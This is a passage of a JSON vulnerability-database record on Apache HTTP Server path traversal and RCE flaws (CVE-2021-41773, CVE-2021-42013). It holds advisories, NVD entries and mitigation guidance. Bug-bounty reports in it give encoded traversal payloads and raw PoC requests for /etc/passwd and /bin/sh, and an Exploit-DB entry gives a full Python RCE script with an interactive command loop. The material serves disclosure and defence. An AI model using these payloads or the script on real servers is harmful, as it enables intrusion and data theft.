4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-04T00:00:00", "id": "HTTPD:2C849FE5B165E832EE21ADAECFA9521C", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "rapid7blog": [{"lastseen": "2021-10-16T08:58:36", "description": "CVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update \n---|---|---|---|---|--- \nCVE-2021-41773, CVE-2021-42013 | [Apache Advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) | [AttackerKB](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) | Available | ASAP | October 12, 2021 15:00 ET \n \n\n\n_See the `Updates` section at the end of this post for information on developments that occurred after initial publication._\n\nOn Monday, October 4, 2021, Apache published [an advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) on [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>), an unauthenticated remote file disclosure vulnerability in HTTP Server version 2.4.49 and 2.4.50 (see the `Updates` section for more on 2.4.50). The vulnerability arises from the mishandling of URL-encoded path traversal characters in the HTTP GET request. Public proof-of-concept exploit code is widely available, and Apache and others have noted that this vulnerability is being exploited in the wild. Note that a non-default configuration is required for exploitability.\n\nWhile the original advisory indicated that CVE-2021-41773 was merely an information disclosure bug, both [Rapid7](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) and [community](<https://twitter.com/hackerfantastic/status/1445529822071967745>) researchers have verified that the vulnerability can be used for remote code execution **when [mod_cgi](<https://httpd.apache.org/docs/current/mod/mod_cgi.html>) is enabled.** While mod_cgi is not enabled in the default Apache Server HTTP configuration, it\u2019s also not an uncommon feature to enable. With mod_cgi enabled, an attacker can execute arbitrary programs via HTTP POST requests. The initial RCE proof of concept resulted in blind command execution, and there have been multiple proofs of concept that coerce the HTTP server into sending the program\u2019s output back to the attacker. Rapid7\u2019s research team has a [full root cause analysis of CVE-2021-41773 here](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) along with proofs of concept.\n\nRapid7 Labs has identified roughly 65,000 potentially vulnerable versions of Apache httpd exposed to the public internet. Our exposure estimate intentionally does not count multiple Apache servers on the same IP as different instances (this would substantially increase the number of exposed instances identified as vulnerable).\n\n\n\n## Mitigation guidance\n\nOrganizations that are using Apache HTTP Server 2.4.49 or 2.4.50 should determine whether they are using vulnerable configurations. If a vulnerable server is discovered, the server\u2019s configuration file should be updated to include the filesystem directory directive with _require all denied_:\n \n \n <Directory />\n Require all denied\n </Directory>\n \n\nApache HTTP Server users should update to **2.4.51** or later as soon as is practical. Updating to HTTP Server 2.4.51 remediates both CVE-2021-41773 and CVE-2021-42013. For more information, see [Apache\u2019s advisory here](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\n## Rapid7 customers\n\nA remote vulnerability check for CVE-2021-41773 was released to InsightVM and Nexpose customers in the October 6, 2021 content update.\n\nA remote vulnerability check for CVE-2021-42013 was released to InsightVM and Nexpose customers in the October 7, 2021 content update.\n\n## Updates\n\n**October 7, 2021:** Apache has updated their advisory to note that the patch for CVE-2021-41773 was incomplete, rendering HTTP Server 2.4.50 versions vulnerable when specific, non-default conditions are met. According to their advisory, "an attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration _require all denied_, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution."\n\nCVE-2021-42013 has been assigned to track the incomplete fix for CVE-2021-41773. CVE-2021-42013 has been fixed in HTTP Server version 2.4.51 released October 7, 2021. For more information, [see Apache's advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-10-06T16:42:32", "type": "rapid7blog", "title": "Apache HTTP Server CVE-2021-41773 Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-06T16:42:32", "id": "RAPID7BLOG:9C7E6BE350F06790928CFF68E04A6ECE", "href": "https://blog.rapid7.com/2021/10/06/apache-http-server-cve-2021-41773-exploited-in-the-wild/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-10-05T20:49:35", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T16:15:00", "type": "cve", "title": "CVE-2021-42013", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-05T18:14:00", "cpe": ["cpe:/a:apache:http_server:2.4.50", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/o:fedoraproject:fedora:35", "cpe:/a:apache:http_server:2.4.49", "cpe:/a:netapp:cloud_backup:-", "cpe:/a:oracle:instantis_enterprisetrack:17.2", "cpe:/o:fedoraproject:fedora:34", "cpe:/a:oracle:instantis_enterprisetrack:17.1"], "id": "CVE-2021-42013", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.50:*:*:*:*:*:*:*"]}, {"lastseen": "2022-10-28T18:32:05", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T09:15:00", "type": "cve", "title": "CVE-2021-41773", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-28T16:16:00", "cpe": ["cpe:/o:fedoraproject:fedora:35", "cpe:/a:netapp:cloud_backup:-", "cpe:/a:oracle:instantis_enterprisetrack:17.2", "cpe:/a:oracle:instantis_enterprisetrack:17.1", "cpe:/a:apache:http_server:2.4.49", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-41773", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*"]}, {"lastseen": "2022-10-28T15:33:28", "description": "While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T09:15:00", "type": "cve", "title": "CVE-2021-41524", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524"], "modified": "2022-10-28T13:51:00", "cpe": ["cpe:/o:fedoraproject:fedora:34", "cpe:/a:apache:http_server:2.4.49", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/a:oracle:instantis_enterprisetrack:17.1", "cpe:/a:oracle:instantis_enterprisetrack:17.2", "cpe:/o:fedoraproject:fedora:35", "cpe:/a:netapp:cloud_backup:-"], "id": "CVE-2021-41524", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41524", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*"]}], "hackerone": [{"lastseen": "2023-01-31T16:25:01", "bounty": 1000.0, "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n-\nMy friend Juan Escobar @itsecurityco and me (Fernando Munoz) reported this internally to Apache HTTPd project and worked with them to test the new patch before the new version was released.\n\n## Impact\n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-14T23:54:06", "type": "hackerone", "title": "Internet Bug Bounty: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-19T00:14:57", "id": "H1:1400238", "href": "https://hackerone.com/reports/1400238", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-31T16:25:08", "bounty": 4000.0, "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.\n\n## Impact\n\nThe attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-08T21:47:54", "type": "hackerone", "title": "Internet Bug Bounty: Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-09T20:19:52", "id": "H1:1394916", "href": "https://hackerone.com/reports/1394916", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-31T16:25:00", "bounty": 1000.0, "description": "Hello Apache team,\n\n@fms and myself were able to bypass the latest patch for CVE 2021-41773 in the Apache 2.4.50.\n\nThese are the payloads:\n\n1) %%32%65%%32%65\n2) .%%32%65\n3) .%%32e\n4) .%2%65\n\nPoC Path Traversal\n\nGET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: localhost:83\nsec-ch-ua: \";Not A Brand\";v=\"99\", \"Chromium\";v=\"94\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: none\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPoC RCE\n\nPOST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: 192.168.88.201\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9,es;q=0.8\nIf-None-Match: \"2aa6-5cda88e8a6005-gzip\"\nIf-Modified-Since: Wed, 06 Oct 2021 05:38:33 GMT\nConnection: close\nContent-Length: 60\n\necho Content-Type: text/plain; echo; id; uname;apache2ctl -M\n\n## Impact\n\nAn attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-18T21:56:01", "type": "hackerone", "title": "Internet Bug Bounty: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.50", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-11-19T23:45:37", "id": "H1:1404731", "href": "https://hackerone.com/reports/1404731", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T06:03:47", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "exploitdb", "title": "Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-41773", "2021-42013", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-11T00:00:00", "id": "EDB-ID:50512", "href": "https://www.exploit-db.com/exploits/50512", "sourceData": "# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)\r\n# Date: 11/11/2021\r\n# Exploit Author: Valentin Lobstein\r\n# Vendor Homepage: https://apache.org/\r\n# Version: Apache 2.4.49/2.4.50 (CGI enabled)\r\n# Tested on: Debian GNU/Linux\r\n# CVE : CVE-2021-41773 / CVE-2021-42013\r\n# Credits : Lucas Schnell\r\n\r\n\r\n#!/usr/bin/env python3\r\n#coding: utf-8\r\n\r\nimport os\r\nimport re\r\nimport sys\r\nimport time\r\nimport requests\r\nfrom colorama import Fore,Style\r\n\r\n\r\nheader = '''\\033[1;91m\r\n \r\n \u2584\u2584\u2584 \u2588\u2588\u2593\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2591 \u2588\u2588 \u2593\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2580\u2588\u2588\u2588 \u2584\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2588\u2588\u2588 \r\n \u2592\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2592\u2588\u2588\u2588\u2588\u2584 \u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2593\u2588 \u2580 \u2593\u2588\u2588 \u2592 \u2588\u2588\u2592\u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588 \u2580 \r\n \u2592\u2588\u2588 \u2580\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2592\u2588\u2588 \u2580\u2588\u2584 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2588\u2591\u2592\u2588\u2588\u2588 \u2593\u2588\u2588 \u2591\u2584\u2588 \u2592\u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2588 \r\n \u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2591\u2593\u2588 \u2591\u2588\u2588 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2584 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2592\u2593\u2588 \u2584 \r\n \u2593\u2588 \u2593\u2588\u2588\u2592\u2592\u2588\u2588\u2592 \u2591 \u2591 \u2593\u2588 \u2593\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2593\u2588\u2592\u2591\u2588\u2588\u2593\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \u2591\u2588\u2588\u2593 \u2592\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2592\u2588\u2588\u2588\u2588\u2592\r\n \u2592\u2592 \u2593\u2592\u2588\u2591\u2592\u2593\u2592\u2591 \u2591 \u2591 \u2592\u2592 \u2593\u2592\u2588\u2591\u2591 \u2591\u2592 \u2592 \u2591 \u2592 \u2591\u2591\u2592\u2591\u2592\u2591\u2591 \u2592\u2591 \u2591 \u2591 \u2592\u2593 \u2591\u2592\u2593\u2591\u2591 \u2591\u2592 \u2592 \u2591\u2591\u2591 \u2592\u2591 \u2591\r\n \u2592 \u2592\u2592 \u2591\u2591\u2592 \u2591 \u2592 \u2592\u2592 \u2591 \u2591 \u2592 \u2592 \u2591\u2592\u2591 \u2591 \u2591 \u2591 \u2591 \u2591\u2592 \u2591 \u2592\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\r\n \u2591 \u2592 \u2591\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591 \r\n''' + Style.RESET_ALL\r\n\r\n\r\nif len(sys.argv) < 2 :\r\n print( 'Use: python3 file.py ip:port ' )\r\n sys.exit()\r\n\r\ndef end():\r\n print(\"\\t\\033[1;91m[!] Bye bye !\")\r\n time.sleep(0.5)\r\n sys.exit(1)\r\n\r\ndef commands(url,command,session):\r\n directory = mute_command(url,'pwd')\r\n user = mute_command(url,'whoami')\r\n hostname = mute_command(url,'hostname')\r\n advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\\'t an interactive shell)')\r\n command = input(f\"{Fore.RED}\u256d\u2500{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\\n{Fore.RED}\u2570\u2500{Fore.YELLOW}$ {Style.RESET_ALL}\") \r\n command = f\"echo; {command};\"\r\n req = requests.Request('POST', url=url, data=command)\r\n prepare = req.prepare()\r\n prepare.url = url \r\n response = session.send(prepare, timeout=5)\r\n output = response.text\r\n print(output)\r\n if 'clear' in command:\r\n os.system('/usr/bin/clear')\r\n print(header)\r\n if 'exit' in command:\r\n end()\r\n\r\ndef mute_command(url,command):\r\n session = requests.Session()\r\n req = requests.Request('POST', url=url, data=f\"echo; {command}\")\r\n prepare = req.prepare()\r\n prepare.url = url \r\n response = session.send(prepare, timeout=5)\r\n return response.text.strip()\r\n\r\n\r\ndef exploitRCE(payload):\r\n s = requests.Session()\r\n try:\r\n host = sys.argv[1]\r\n if 'http' not in host:\r\n url = 'http://'+ host + payload\r\n else:\r\n url = host + payload \r\n session = requests.Session()\r\n command = \"echo; id\"\r\n req = requests.Request('POST', url=url, data=command)\r\n prepare = req.prepare()\r\n prepare.url = url \r\n response = session.send(prepare, timeout=5)\r\n output = response.text\r\n if \"uid\" in output:\r\n choice = \"Y\"\r\n print( Fore.GREEN + '\\n[!] Target %s is vulnerable !!!' % host)\r\n print(\"[!] Sortie:\\n\\n\" + Fore.YELLOW + output )\r\n choice = input(Fore.CYAN + \"[?] Do you want to exploit this RCE ? (Y/n) : \")\r\n if choice.lower() in ['','y','yes']:\r\n while True:\r\n commands(url,command,session) \r\n else:\r\n end() \r\n else :\r\n print(Fore.RED + '\\nTarget %s isn\\'t vulnerable' % host)\r\n except KeyboardInterrupt:\r\n end()\r\n\r\ndef main():\r\n try:\r\n apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'\r\n apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'\r\n payloads = [apache2449_payload,apache2450_payload]\r\n choice = len(payloads) + 1\r\n print(header)\r\n print(\"\\033[1;37m[0] Apache 2.4.49 RCE\\n[1] Apache 2.4.50 RCE\")\r\n while choice >= len(payloads) and choice >= 0:\r\n choice = int(input('[~] Choice : '))\r\n if choice < len(payloads):\r\n exploitRCE(payloads[choice])\r\n except KeyboardInterrupt:\r\n print(\"\\n\\033[1;91m[!] Bye bye !\")\r\n time.sleep(0.5)\r\n sys.exit(1)\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50512", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2022-11-01T23:20:10", "description": "**Issue Overview:**\n\nA NULL pointer dereference was found in Apache httpd mod_h2. The highest threat from this flaw is to system integrity. 